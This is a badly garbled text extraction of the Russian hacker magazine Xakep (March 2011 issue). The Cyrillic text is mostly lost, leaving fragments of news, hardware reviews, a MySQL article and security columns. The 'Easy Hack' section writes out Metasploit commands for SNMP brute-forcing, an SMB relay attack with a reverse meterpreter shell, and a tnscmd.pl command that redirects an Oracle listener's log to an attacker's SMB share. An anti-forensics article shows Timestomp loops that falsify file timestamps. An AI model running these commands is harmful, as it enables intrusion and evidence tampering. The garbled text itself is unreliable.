Вы находитесь на странице: 1из 149

x 03 (146) 2011

.
210
:

PALEVO: C . 74

03 (146) 2011

MySQL /

MySQL


WINDOWS

. 44



. 22

146


HACKQUEST 2010
RETURN-ORIENTED ROOTKITS
NAS

APPLESCRIPT
PYTHON



. 28

INTRO
, ?
, , .
,
,
.
, , .
: ,
, .
.
, , , .
,
,
.
, IT, ,
.
- ,
. , -

INTRO

1 .
, , ,
.
, 120 varchar(20) ,

, ,
. , ,
,
, , ,
.
,
, . ,
:).
nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209

CONTENT
MegaNews

004

082

088

094

- -

FERRUM
016

NAS

PC_ZONE
022

MySQL

028

-,

034

038

,
?

Memoryze

Liberte Linux:

098

Return-Oriented Rootkits !

102

Mac OS X

106

AIR'

112

115

iPhone Mac OS X

AppleScript

Adobe AIR
-

040

Easy-Hack

044

SYN/ACK

050

118

DLP-?

056

122

060

128

066

... !

072

X-Tools

Windows

HackQuest 2010

MALWARE

Mac OS X
Apple

Microsoft Oracle

132

074

Palevo!

138

FAQ UNITED

078

Python

142

144

WWW2

FAQ

8.5

web-

066

... !

HackQuest 2010

022

MySQL

,
?

074
Palevo!

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


> xakep.ru
(xa@real.xakep.ru)

/ART

>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
Hi-Fi
(khamidulina@glc.ru)

>
(alekhina@glc.ru)
(nesterova@glc.ru)
>


>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>



>

> -
(alekseeva@glc.ru)
> MAN TV

>

>

>
(kosheleva@glc.ru)
>

>

>



> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
159 916 .

.

. ,
,
.


.
.


:
content@glc.ru
, , 2011

MEGANEWS

Mifrill (mifrill@gameland.ru)

Meganews

GSM
GSM- ( , ),
(, Kraken,
A5/1). , ,
,
-.
(
). GSM- , , .
, , . Chaos
Computer Club Congress ,
GSM- -,

$15. GSM-
Security Research Labs
, GSM OsmocomBB. GMS- ,
. :
SMS-,
. , ,
.

,
,

( ).
, ,
. GSM-:
,

. ,
. 64-
, . . ,
( , ),
, -,

.
: events.ccc.de.

100 BitTorrent,
- .

ZEUS + SPYEYE = ?

004

ZeuS SpyEye ,
,
.
, SpyEye ,
.
, , , ,
,
SpyEye, Gribodemon/Harderman.
, . SpyEye,
ZeuS. : Trusteer Rapport,
. ,
Jabber, VNC,
. ,
Firefox.
SpyEye Windows, ,
ffcertgrabber, ,
. , ,
Trend Micro,
. , .
X 03 (146) 2011

MEGANEWS

IT-
. Apple,
. , 2009 ,
. ,
,
, .
,
.
Apple ,
2009.
Google ,
, .

. ,
2001 , Google
,
.

,
Panda Labs, $2. $80
. ,
$82 000, $700.

006

Trend Micro
, WORM_RIXOBOT.A ( TROJ_RANSOM.
QOWA).
, .

2010 137 000 .
: , Trend Micro
.

,
.
, SMS 2 500 , 2%
. ,
SMS 360 , ,

901 245 ($29.5 .). ,
, , ,
100 000 000 . , -
,
?
X 03 (146) 2011

MEGANEWS

. FACEBOOK.

,
, .
.
Facebook,
, .
Gmail Yahoo , , Facebook, . ISP
JavaScript, HTTPS HTTP
.
(, ,
2010, -
HTTPS). , URL,
.
ISP. ? ,
. , Facebook
. Facebook
,
, . -

, 5- ,

, !
, ,
, Facebook
. , ,
, !
, , Facebook
. 10-
: HTTPS- (- ISP
HTTP, -
), . , ,
.
, ,
Facebook .

51,8% Android 2.2


Google. 2.3
0.4% .


,

.
(, )
,
, WirelessHD, WHDi WiDi.

Wireless
USB-, ,
.
, ,
.
, , USB-,

.
KFA2 NVIDIA GeForce
GTX 460 WHDI. ,
,
WHDI (Wireless Home Digital Interface).

WHDI- ( , ?),
.
,
. WHDI

008

(
!), FullHD
(1080p). , , GeForce
GTX 460 WHDI 1 GDDR5
256- ,
, CUDA.

,
-! :)

. .
,
,
.

X 03 (146) 2011

MEGANEWS

, ,
.
, ...
, .

. 26- (.
146 ).
,
. , , ,
! . 26-
,
(
), 200 000.


108 000 .
, , . , ,
,
,
.

80
CES 2011, -.


,
. ,
, .
LG, LED- E90 c 21.5. ,
, ,
7.2 !
, -

( 40% ,
-
CCFL)
. E90
.
(D-sub, DVI-D, HDMI)
EZ-cabling.
: 2
, 1920x1080. 13 000 .


CES
eCoupled. eCoupled
( ),
90%
10% .

. ,

, ,
Tesla Roadster.
eCoupled, , (
).

.

010

X 03 (146) 2011

APP STORE
Apple
Mac App Store
.
App Store ( iPhone,
iPod touch iPad),
,
Mac OS.
App Store:
, ,
.
iTunes ,

. Mac App Store
, .
Mac OS X Snow Leopard.
Mac
Linux :
, Microsoft
?. , .
?

107 . , , 89,1% (
Pingdom).

HOTMAIL


Windows Live Hotmail Microsoft. ,
, Hotmail ,
(, ).
,
. ,
, , ,
Hotmail. Windows Live
:
.
,
. Microsoft ,
,

, .
, , ,
, . .
X 03 (146) 2011

011

MEGANEWS



CES (Consumer Electronics Show),
- ,
. , Motorola Atrix 4G,
. Motorola
,
. , . , Atrix 4G HDMI-
, USB-
( -),
. -,
- 11.6, ,
, .
,
- .
, Atrix 4G ? : Motorola Atrix 4G ,
, .
4- (960540 )
NVIDIA Tegra 2
1 . Android 2.2,
2.3. ,

1930 ,
9 , 136 .
, (5
), VGA- ,
Wi-Fi 802.11b/g/n, Bluetooth, GPS, miroSD .
, ,
. , ,
Motorola,
, .

10 Wikipedia 15 . .

3D
Avenue Q, :
Internet is for porn ( ), .
,

.
. ,
,


,


.
:
Kinect Microsoft XXX (, ,
). 3D-
3D-. , , 3D ,

. ,

3D
, . ,
,
3D-. ,
: ,
, , -
3D-
. , ,
:).

WINSTON FREEDOM MUSIC


2010
Winston Freedom Music.
Super Jam Sessions,
, .
,
- Kaiser Chiefs,
, Grammy MTV Music
Awards, Dirty Vegas.

012

X 03 (146) 2011

MICROSOFT
,
Apple Magic Mouse.

,
. :
Apple
Microsoft. ,
Touch Mouse, , , .
: . ,
, ,

.
,
, ,
. BlueTrack
,
.

. Touch Mouse
USB- Snap-in Nano, 2.4 .
,
Amazon.com
. $79.95.

ITUNES-


iTunes, Apple
. ,
, Apple ,

.
TaoBao ( Ebay)
50 000 iTunes

.
, .

Apple, ,
( ,
). ,


iTunes?
,
, ,
(
). , ,
.
PayPal, ,

iTunes , ,
iTunes,
Apple.

MS
, GeoHot,

iPhone PlayStation 3.
(geohot.com)

Windows Phone 7,
Microsoft. ,

. ,
Microsoft
WP7-X 03 (146) 2011

. : GeoHot,
WP7,
e-mail,
WP7-!. ,
, Microsoft
, .
: MS
ChevronWP7
( WP7)
.

013

MEGANEWS

SMS

, ? , , , , .
27C3,
.
,

, MMS ,
. , , , , SMS
-
.
GSM-,
120 000 SMS. , ,
- .

Samsung, Sony Ericsson, Motorola LG. ,
SMS-.

45% PayPal.
, OpenDNS.

DDR4 SAMSUNG
Samsung
DDR4, , 3 . ,
, ,
, 40%
, DDR3, 1.5 ,
. ( DDR4
1.05 )
Pseudo Open Drain (POD),
/. 2.133 /
1.2 ( DDR3,
1.35 1.5 , 1.6 /). JEDEC
DDR4 .

MOZILLA
Mozilla Foundation , , , , 44
000 ,
addons.mozilla.
org. -
, , .
Mozilla ,
,
,

014


2009 . ,
,
MD5. ,

,
.
Mozilla, , ,
,
,
Mozilla.
X 03 (146) 2011

X 03 (146) 2011

15

FERRUM

: Intel Core 2 Duo E4700


( 3500 )
: ASUS P5QC
: 2x1024 ,
Kingston , DDR2-800
: NVIDIA GeForce 9800 GT
: 430 , Thermaltake
: Microsoft Windows 7
Ultimate x32

D-Link DNS-343
NETGEAR ReadyNAS NVX
QNAP TS-459
Synology Disk Station DS411+
Synology Disk Station DS410j
Thecus N3200

NAS
,
, , .
HDD ,
, , .
NAS .

NAS : Network Attached Storage


. , ,
. ,
, NAS
,
. . , NAS
,
, - -, , IP- . NAS
,
RAID. , , . ,
, , ,
RAID 0 ( , Ethernet
). ,
, RAID 1 RAID 5,
.
(USB, eSATA ), -

016

,
NAS . -,
.


NAS
: Thecus N3200
HDD , ,
. 2 Hitachi. ,
,
Intel NAS Performance Toolkit,
NAS-, , ,
-, .
RAID 5
RAID 0. ,
, , , , ,
.
X 03 /146/ 2011

13500 .

22000 .

D-Link
DNS-343

NETGEAR
ReadyNAS NVX

: CIFS/SMB, FTP, UPnP, http


: -, -, torrent-, iTunes
: RAID 0, RAID 1, RAID 5, JBOD, Standard
: 128
: ARM926EJ
: Ethernet (10/100/1000 /), USB

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour
: -, -, torrent-, iTunes, ReadyNAS Remote
: X-RAID2, RAID 0, RAID 1, RAID 5
: 1
: Intel EP80579 1
: 2xEthernet (10/100/1000 /), 3xUSB

D-Link DNS-343, , : ,

. -,
, IP , ,
. , D-Link DNS-343
.

ReadyNAS NVX - ,
- . , .
,
LCD-, .
, .
, .
ReadyNAS NVX, ,
.
X-RAID2, -.

, .
, , USB . , D-Link DNS-343 . ,
.

X 03 /146/ 2011

ReadyNAS NVX
[O2], :
.

017

FERRUM

31000 .

27000 .

QNAP
TS-459 Pro

Synology
Disk Station DS411+

:CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour, iSCSI
: -, -, torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, JBOD
: 1
: Intel AtomD510 1.66
: 2xEthernet (10/100/1000 /), 5xUSB, 2xeSATA, VGA

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour, iSCSI
: -, -,mail-,
torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, RAID 10, JBOD,
Standart
: 1
: Intel Dual-core 1.67
: Ethernet (10/100/1000 /), 2xUSB, eSATA

QNAP
. 5 USB,
,
eSATA, VGA. QNAP TS-459 Pro Intel Atom , 1.66
Hyper Threading. 1
DDR2 . ,
, ,
, NAS. , .

Synology Disk Station DS411+


.
-, - PHP/
MySQL. , IP-, Synology
Disk Station DS411+ . .
, ,
.

, , . , , .

018

, , Synology Disk Station DS411+


: USB eSATA. ,
. ,
,
, .
X 03 /146/ 2011

14500 .

9000 .

Synology
Disk Station DS410j

Thecus
N3200

: CIFS/SMB, FTP, UPnP, http, AFP, NFS,


DLNA, Bonjour, iSCSI
: -, -,
mail-, torrent-, iTunes.
: RAID0, RAID1, RAID5, RAID6, RAID5+, RAID 10, JBOD,
Standart
: 128
: ARM 800
: Ethernet (10/100/1000 /), 2xUSB

: CIFS/SMB, FTP, http, AFP, NFS, DLNA,


: -, -,
torrent-, iTunes.
: RAID0, RAID1, RAID5,JBOD
: 256
: AMD Geode LX800 500
: 2xEthernet (10/100/1000 /), 2xUSB, eSATA

Synology .
, ,
, DS411+.
, , -, :

.
Synology Disk Station DS410j ,
.

, Synology Disk Station DS410j , USB


. USB, .

X 03 /146/ 2011

,
. ,
, , . , RAID5 Thecus N3200
. ,
HDD,
. AMD. :
-, -,
.
, .

, , Thecus N3200 .
, , .
.

019

FERRUM

INTEL NAS PERFORMANCE TOOLKIT, RAID 0


D-Link DNS-343
NETGEAR ReadyNAS NVX
QNAP TS-459 Pro
Synology Disk Station DS411+
Synology Disk Station DS410j
Thecus N3200

Photo Album

File copy from NAS

File copy to NAS

HD Video Playback
0,0

20,0

40,0

60,0

80,0

100,0

120,0

140,0

QNAP TS-459 Pro Synology Disk Station DS411+

INTEL NAS PERFORMANCE TOOLKIT, RAID 5


D-Link DNS-343
NETGEAR ReadyNAS NVX
QNAP TS-459 Pro
Synology Disk Station DS411+
Synology Disk Station DS410j
Thecus N3200

Photo Album

File copy from NAS

File copy to NAS

HD Video Playback
0,0

20,0

40,0

60,0

80,0

100,0

120,0

140,0

RAID5

, NAS,
. QNAPTS-459 Pro
, .

020

Thecus N3200
.

, Synology Disk Station
DS411+. z
X 03 /146/ 2011

PC_ZONE
aleks.raiden@gmail.com


MySQL

,
Oracle
Sun, MySQL?
? .
!
MySQL, . , , .
. - -.
, , .

MySQL. ,
Sun
Oracle. ,
,
MySQL.
. Oracle, , , : - .
.

022

5.5, , :
, . ? MySQL , ,
. .

, MySQL.
, ?
, PostgreSQL. ! MySQL,
.
. ,
( X 03 /146/ 2011

MariaDB
MariaDB
).
- MySQL? .
(
MySQL), ,
.
MySQL
,
.
, .

, ,
,
.

InnoDB,
Oracle. , MariaDB.

MariaDB

2008 ,
MySQL, ,
,
, MySQL.
MyISAM,
, ,
. -

MySQL,

X 03 /146/ 2011

MariaDB? ,
,
SQL MySQL.
:
.
?,
.
, , ,
. ,
Sphinx,
,
.
, (
, Google Facebook)
MariaDB.
,
.
,
. MariaDB
,
.

InnoDB MyISAM, MariaDB
, . Aria
MyISAM

. MyISAM
,
, Aria ,
.
MariaDB ,
. Oracle
InnoDB XtraDB,
Percona.
MySQL
, .
( )
.
MySQL XtraDB
MariaDB , InnoDB.

HTTP://WWW
links
SkySQL: skysql.com;
MariaDB:
mariadb.org;
Percona:
percona.com;
Drizzle: drizzle.org;
MySQL: mysql.com;
HandlerSocket:
bit.ly/a9B7Gh.

INFO

info


Oracle

,

$2 000 000,



$300 000.
,
,


.

023

PC_ZONE

?
,
. , , API .
, , (
),
.
( + ) ,
.
,
. MySQL .
InnoDB (, )
,
. ,
MariaDB Drizzle, .
MySQL- .
InnoDB , 5.5
- . , , . .
MyISAM ,
. ,
.
MySQL,
.
Aria MyISAM .
MyISAM.
CVS ,
, .
Federated/FederatedX

() .
, ,
.

XtraDB : . ,
InnoDB, :).
,
( ?) MySQL.
Google , , ,
, MySQL
.
XtraDB
I/O, -
.
,

, .
, ,
.
SHOW ENGINE INNODB STATUS.
: ,
, ,
, MySQL. :
,
.
.
, Firebird
PosgreSQL, , -

024

PBXT InnoDB ,
, ,
.
.
Blackhole , ,
, /dev/null
. .
Archive ,
. ,
. , .

.
XtraDB InnoDB Percona.
MERGE Federated
.
MEMORY ,
, .
, .
BlitzDB MyISAM
. .
NDB , , , .
Falcon MySQL AB, Sun,
InnoDB.
SphinxSE
Sphinx.
. , .
MVCC (Multiversion Concurrency Control
,

) . MariaDB PBXT,
, . , , ! PBXT
,
, -

, MySQL ...

X 03 /146/ 2011

MySQL
. ,
,
, .
, - - ,
,
. FederatedX,

, OQGRAPH,
, . , Facebook ,
, .

Percona?
Percona, .
, c
, ,

MySQL. ,
Percona MySQL
.
,
.
Percona
5.1,
5.5, Oracle.
PBXT, ,
Percona.
, .

X 03 /146/ 2011

Handlersocket-, InnoDB
NoSQL . ,
, 750 000

Cloud Computing

Drizzle
. ,
: cloud computing, Google Proto Buffers, ,
. :
,
, , CRM-.
MySQL,
,

025

PC_ZONE

NoSQL-
NoSQL. ,

SQL-
- (key-value).
/ (
Redis) , , JSON ( MongoDB). , , ,
,
SQL- ? : Yoshinori
Matsunobu HandlerSocket, InnoDB NoSQL-,
SQL. : 750 000 ! , Percona ,
. ! , ,
,
, Drizzle
?
.
UNIX- ( ,
) Windows.
Drizzle
. ?
, , ,
. Google Protocol Buffer. , ,
. ,
.
MySQL-,
libdrizzle
, Perl, PHP, Python
Lua.
: MySQL.
Gearman (.
), Drizzle

Drizzle

026

, memcache ,
RabbitMQ ( WebSocket).
Drizzle InnoDB,
. XtraDB PBXT.
Drizzle MySQL 5.0,
.
. Drizzle , .

MySQL, Oracle , , ,
. MySQL
, LAMP (LinuxApache-MySQL-PHP).
,
MySQL. . , 100%
.
: ,
. ,
.
,
,
,
. MariaDB
.
, Drizzle.
,
.

Oracle Percon.
,
,
MySQL,
. ?
! z

, ,

X 03 /146/ 2011

PC_ZONE
Ant (antitster@gmail.com)

-,

, ,
.
, , ,
, .
, .
!
028

X 03 /146/ 2011

? : ,
.
- , (, R-Studio). , .
-,

, .
,

,
.
.
- !


. , ,
. ,
.
(
).
- Windows
Thumbs.db. ,
,


sdelete


Thumbs.db
X 03 /146/ 2011

.
, .
, ,
JPEG ( ).

. Thumbs.db ( , ). Thumbnail Database Viewer
(itsamples.com/thumbnail-database-viewer.html). ,
, . SDelete (technet.microsoft.
com/ru-ru/sysinternals/bb897443)
: sdelete.exe -p 2 file1.jpg
- ,
, .

. , - Thumbs.

029

PC_ZONE

db? , ?
- ! ,
. ,
,
? Thumbs.db. Windows XP DisableThumbnailCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Explorer\Advanced 1. Windows 7
NoThumbnailCache HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Policies\Explorer. , ,
Thumbs.db.

Thumbs.db

.
, ,
<Shift+Delete> . , ,
.
, . ,
,
, .
,
, . ,
, NTFS. - :
JPEG. WinHex jfif.
274432. ,
( HDD Wipe Tool) . ,
WinHex, 274432,
.
DiskDigger, Photorec, Foremost .
.
, , ,
, ? , . ,
. ,
. ASCII. ,

. , anti,
: 0110000101
1011100111010001101001. , ,
anth. . . ,
,
, .
.

,
-.
.

030


Foremost

.

, .
. , ,
(
).
(pagefile.sys) , Hibernation (hiberfil.sys).
,
. , .
, :

. , Back Track,
, . , LiveCD, BackTrackForensic,
Foremost.

.
, , , :
#foremost -i /mnt/hda1/pagefile.sys -o /root/
Desktop/page_file -v -q

/mnt/hda1/
pagefile.sys, /root/
X 03 /146/ 2011

Foremost

AccessData FTK Imager

,

mp3jpgmp3jpgmp3jpg

Desktop/page_file. .
Foremost 524
.

jpg:= 73
gif:= 4
gif:= 19
jpg:= 77
jpg:= 95
doc:= 1
pgp:= 65
pgp:= 62
pgp:= 44
pgp:= 36
dat:= 7
lnk:= 3
cookie:= 38


.
, jpg. X 03 /146/ 2011



COOKIE
,

,

YOUTUBE.
, .
: ,
; -; Facebook
. ,
.
, doc-,
. , , Word
, .
cookie
,
,
YouTube. ,
,
.
? . .
Control PanelSystem and
SecuritySystemAdvanced System SettingsPer
formanceAdvancedVirtual MemoryChange
No paging file.

.
,
ClearPageFileAtShutdown HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management 1. , ,
,

. hiberfil.sys.

INFO

info


:
Eraser 6.0.8:
eraser.heidi.ie;
SDelete 1.51:
technet.microsoft.
com/ru-ru/
sysinternals/
bb897443;
Freeraser: codyssey.
com/products/
freeraser.html;
Overwrite 0.1.5:
kyuzz.org/antirez/
overwrite.html;
Wipe 2.3.1: wipe.
sourceforge.net;
Secure Delete:
objmedia.demon.
co.uk/freeSoftware/
secureDelete.html;
CCleaner 3.03:
piriform.com.

DVD
dvd



.

031

PC_ZONE


DiskDigger

,
. ,
. , FTK Imager (accessdata.com/support/adownloads).
FileAdd Evidence Item ,
.
, pagefile.sys .
,

. , ,
DiskDigger (diskdigger.org) PhotoRec (www.cgsecurity.org/wiki/
PhotoRec). ,
.

-.
.
WinHex. ,
. WinHex,
Open Disk .
(Ctrl+A)
(Ctrl+L). ,
.
, , .
NTFS. Windows
XP FAT, NTFS.
,
,
Optimize for performance.
NTFS.
,
. .
jpeg- - (, jpeg) : 1.mp3, 1.jpg, 2.mp3, 2.jpg, 3.mp3, 3.jpg.
, ?
, DiskView (technet.

032

microsoft.com/ru-ru/sysinternals/bb896650). ,
, (
). , . , <Refresh>. ,
, ,
, .
, . <Refresh> , jpeg-
. WinHex.
, ,
: jfif, jpeg-. ,
, ,
. , :
, :). , , :
C:\Documents and Settings\Administrator>defrag h:
Windows Disk Defragmenter
Copyright (c) 2001 Microsoft Corp. and Executive
Software International, Inc.
Analysis Report
7,47 GB Total, 7,43 GB (99%) Free,
Fragmented (0% file fragmentation)

0%

Defragmentation Report
7,47 GB Total, 7,43 GB (99%) Free,
Fragmented (0% file fragmentation)

0%

, , .
<Refresh> DiskView, ? ,
,
, . !
, ,
?
, . jfif. -, !
.
DiskDiggera
Photoreca. ,
X 03 /146/ 2011

274432

DiskDigger
6 3

274432
-
.
Sdelete
,
. ,
- .
!

, ,
? . , ,
. ,
// .
? metasploit.com
, Timestomp (metasploit.com/data/antiforensics/timestomp.
exe), ,
. :
-m <date>

-a <date>

-c <date>

-e <date>

-z <date>

X 03 /146/ 2011




, MFT

DiskDigger
: DayofWeek Month\Day\Year
HH:MM:SS [AM|PM]. -b, ,
EnCase :). ,
,
: timestomp.exe boot.ini -z "sunday 1/12/2099
10:00:00 pm". ,
.
:
for /R c:\tools\ %i in (*) do timestomp.exe %i -z
"monday 3/12/2009 10:00:00 pm"
-
HDD. ,
, . -,
, .
DefCon: isecpartners.com/files/
iSEC-Breaking_Forensics_Software-Paper.v1_1.BH2007.pdf.

. , .
,
, ,
.

.
:). z

033

PC_ZONE
Step twitter.com/stepah

Memoryze


live, .
, , ,
-,
,
.
, .
, , .

034

,
, .
Mandiants Memoryze ,
.
X 03 /146/ 2011

Memoryze
, ,
. Memory Forensic.
( Memoryze)
, ,

. . , , (
, ) , ,

. ,
.
- ,
. ,
, .
, .

Memoryze?

Memoryze .
, must have,

, . ,
-
. ,

, . Mandiant:
mandiant.com/products/free_software.
, Memoryze:
(
API-),
;
, DLL EXE, (
);
;
, ,
,
(,
X 03 /146/ 2011


),
,
;
, ;
, , ;
;
(
);
.
, Memoryze,
, : Memoryze
GUI- Audit Viewer.
. Memoryze
, .
,
Audit Viewer,

.
,
.

, ,
. , portable,
: msiexec /a MemoryzeSetup.
msi /qb TARGETDIR=_____
_.
Audit
Viewer,
.

, , . , Memoryze
.
batch .
, MemoryDD.bat, -
.
c memoryze.exe : G:\\\\memoryze\\\\MemoryDD.bat.
: -

HTTP://WWW
links
,



Audit Viewer.

c Memoryze

batch-.
,
,

Process.bat.

,

. ,
Process.bat ports
true


. ,
, GUI

.

035

PC_ZONE


Reverse Engineering?
Memoryze . , .
, , ,
,
.

.
:
ProcessDD.bat -pid<PID>
;
ProcessDD.bat -pid <PID> -input<filename>
.
:
DriverDD.bat -driver<drivername>;
DriverDD.bat -driver<drivername> -input<fname>.


. . ,
Memoryze kernel-mode ,
. .
, , - .
, .
,
. ,
. ,
( Memoryze/Audits).
, .
, .

, ,
Audit Viewer.

Memoryze. , .
, .
(, , ) .
. , , Memoryze Audit Viewer
, , (, Windows XP
SP1). ,
:
Windows 2000 Service Pack 4 (32-bit);
Windows XP Service Pack 2 and Service Pack 3 (32-bit);
Windows Vista Service Pack 1 and Service Pack 2 (32-bit);
Windows 2003 Service Pack 2 (32-bit);
Windows 2003 Service Pack 2 (64-bit);
Windows 7 Service Pack 0 (32-bit);
Windows 7 Service Pack 0 (64-bit);
*Windows 2008 Service Pack 1 and Service Pack 2 (32-bit);
*Windows 2008 R2 Service Pack 0 (64-bit).
,
-.
auditviewer.exe Configure
Memoryze. Open Existing

036


Results
.
Memoryze . :
(,
) . img-
.
,
, . ,
, , .
. :
Audit Viewer, .
.
,
, . , (Extract
strings) .

( ), , .
:
(Process Enumiration) ,
Extract Strings.
(Acquisition)
. ,
-
.
, Audit Viewer
, -.
, , , ( ).
, .
X 03 /146/ 2011

BAT-, Memoryze

DLL, ,
. :
, , , , .
.
.
, . Occurrences
(,
dll-).
Least Frequency of Occurrences
(LFO), .
, :
.
, , ,
. , .
.

, .
Audit Viewer live-,
. ,
swap-, .
MRI (Memoryzes
Malware Rating),
.
- ,
. ,
, .
.

( MD5, SHA1, SHA256). ,
: , MD5.
. ,
img-, Acquire (and/
or) Analyze Live Memory. . ,

. ,
.
( ,

) Memory
Acquisition.
X 03 /146/ 2011

Memoryze?

Memoryze Audit Viewer


Memory Forensic. Volatility Framework
(volatilesystems.com). MiniGW Python Windows,
.
Linux (
bit.ly/VolatilityManual).
SANS
Investigative Forensic Toolkit
.
VMware (computerforensics.sans.org/community/downloads)
.
- , - ?
Memoryze.

.
:
, .
, Audit Viewer ,
. , .
(Occurrences
MRI)
, .
, Memory Forensic
, ,
( ). ,
,
. z

DVD
dvd



.

037

PC_ZONE
PC_ZONE
Step step@gameland.ru



?
, , , . ,
. ( )
- ,
. -
,
, -,
, -,
. .


. , , .
, ,
, .
,

,

.
,
.
,
, : sed grep.



: ,
.
-
,

. .

,
. , , ,

Wikipedia. ,
,
,
.
,

38
038

, ,
, . strfriend
(strfriend.com)
, .
.
-

. e-mail
^([^@\s]+)@((?:[-a-z0-9]+\.)+[a-z]{2,})$
.
,
(. ).
,
,
( , ) , ,
.
Graphrex (crotonresearch.com/
graphrex),
Eclipse.

RegexBuddy (regexbuddy.com),
.
( ) :
. ,
. ?

, , 2-

4- , A Z
0 9, RegexBuddy
: \A[A-Z0-9]{2,4}.

,
(Perl,
C#, PHP, Python, Java, JavaScript ).


,
.
,
Expresso (ultrapico.com) The regulator
(sourceforge.net/projects/regulator). RegexBuddy ,
.

,

.
, ,
.

. RegexMagi (regexmagic.
com). , ,

,
,
.

. z

XX 0013 (/114446)/ 22001111


GreenDog (agrrrdog@gmail.com)

Easy Hack
1

Metasploit,
MAC,
Oracle,
Zenmap

: GUI-
Metasploit Framework.

:
MSF GUI-, Java. , .
. Java- . . ,
.
/, . .
.
-, .
, :).
. (, ) Armitage. - . fastandeasyhacking.com.
Armitage, GUI, Java RPC MSF ( RPC,
- MSF,
Armitage ). GUI Java 1.6, (PostgreSQL
MySQL), MSF. Armitage ,
-.
. - :). ,
.
, MSF , . ,
.
:
fastandeasyhacking.com/media.
,
Armitage GUI. :

,
( MSF) :
ruby msfrpcd P password f

P ( msf), -f (
Win).
3. Armitage , armitage.bat. ,
msfrpcd, . ,
MSF' %MSF%\
config\database.yml.
4. Connect :).

*nix.2.

:);
, ;
/ ;
.

1. Armitage , apt-get:
apt-get install armitage

2. Win- ( ruby ).

Incognito.

3. . BackTrack4 R2 MySQL:

Armitage
, MSF (
- ?).
MSF (msfupdate). , Win.
1. MSF.
, armitage.bat , icons; armitage
msf3, armitage data.
2. msfrpcd.
msfconsole loadxml, ,

040

MySQL:
/etc/init.d/mysql start
Armitage:
./armitage.sh

\ root\toor.
: Armitage
msfupdate.
X 03 /146/ 2011

: MAC- .

:
--, .
. , MAC- 48- , .
, MAC .
MAC . ,
- . MAC'
. MAC-,
- , .
Unix macchanger (alobbs.com/
macchanger). MAC,
( )
.

MAC-
ifconfig eth0 down
macchanger -a eth0

MAC eth0,
.
(Linux):
ifconfig ethN hw ether <mac-address>

Win TMAC
(technitium.com) ,
. , IP
DHCP,

:
, SNMP-.

:
SNMP (Simple Network Management Protocol)
(,
, ).
SNMP UDP-. 161 . SNMP .
1 ,
community string, UDP-.
. 2 3 , .
, IP
SNMP-. ,
UDP .
, ,
. community string' public
private / .
, public , .
, SNMP , X 03 /146/ 2011

.
:). , ' DoS- IP- . ,
DHCP. ,
MAC' IP. DHCP-
. MACIP 24
. , (
) IP-,
, :). Metasploit'
, DHCP Exhaustion.
, DNS MiTM. :
digininja.org/metasploit/dns_dhcp.php

, . , SNMP-

- , IBM Tivoli. .
-, 1 . -,
SNMP , .
-, -
ssh , SNMP
. UDP-.
. community, Metasploit':
:
use auxiliary/scanner/snmp/snmp_login
:
set RHOSTS ip_addr
run

, .
auxiliary/scanner/snmp/snmp_enum.
. SNMP

041

,
, MIB ( )
, (
snmp_enum).
, /.

/ Cisco, Windows-.
MIB' SNMP net-snmp.sourceforge.net, ,
, BT4..

:
.

:
. ,
- , , . ,
?
... netcraft.com
.
, xakep.ru. xakep (. ). , ,
, .

:
- ;
? ;
[] - .

, xakep.ru
:

... xakep.ru +
*.xakep.ru

googl:
www.google.*.??

, IP- .

:
Windows.

:
, , (Safe Mode) -
, :). ,
, ( :)),
. :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
SafeBoot


. :
, .
. SafeBoot -

: Windows c Oracle
TNS-listener.

:
TNS-listener'.
Oracle 8/9. (
), . set_log' SMBRelay'.
, , .

042

?
() Minimal Network, ,

.
, , . ,
:).

, SMBRelay (, Metasploit):
use exploit/windows/smb/smb_relay
:
set PAYLOAD windows/meterpreter/reverse_tcp
smbrelay:
set RHOST IP_
back-connect :
set LHOST _IP
exploit
X 03 /146/ 2011

perl-, Oracle-
, SMB-relay.
./tnscmd.pl -h oracle_server_ip --rawcmd
"(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)
(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE
=LISTENER)(VERSION=1)(VALUE=\\\\ip_smb_relay_
server\\share)))"

: Nmap
Zenmap.

. Oracle (8/9), , ,
, ,
.
Oracle'
, . ,
.
- vimeo.com/5500931.

op, fp, ufp ,


, , .
s: (. ).
Zenmap'
. ,
.
GUI
1 000,
.

Nmap .
. , XML ( -oX) gnmap ( -oG).
greppable nmap, grep.

.
grep'
Zenmap
, .

Zenmap'.
: Zenmap GUI Nmap'.

.

, , . , Zenmap
XML-.
-,

. , ,

- ,

.
,
XML
.
, ,
.
.
IP-
.

:
OllyDBG.

:
,
, . , -
,
, .
. ,
,
X 03 /146/ 2011

,
. , :).
. .
.
OllyStepNSearch,
(blog.didierstevens.com/programs/
ollystepnsearch).
, , ( F7) ,
. ,
, . . z

043


m0r0 m0r0@inbox.ru

Windows


. .
,
, , . ,
:
.
,

, . ,
.
-
AD. AD
, .
, . , .
AD. , , .
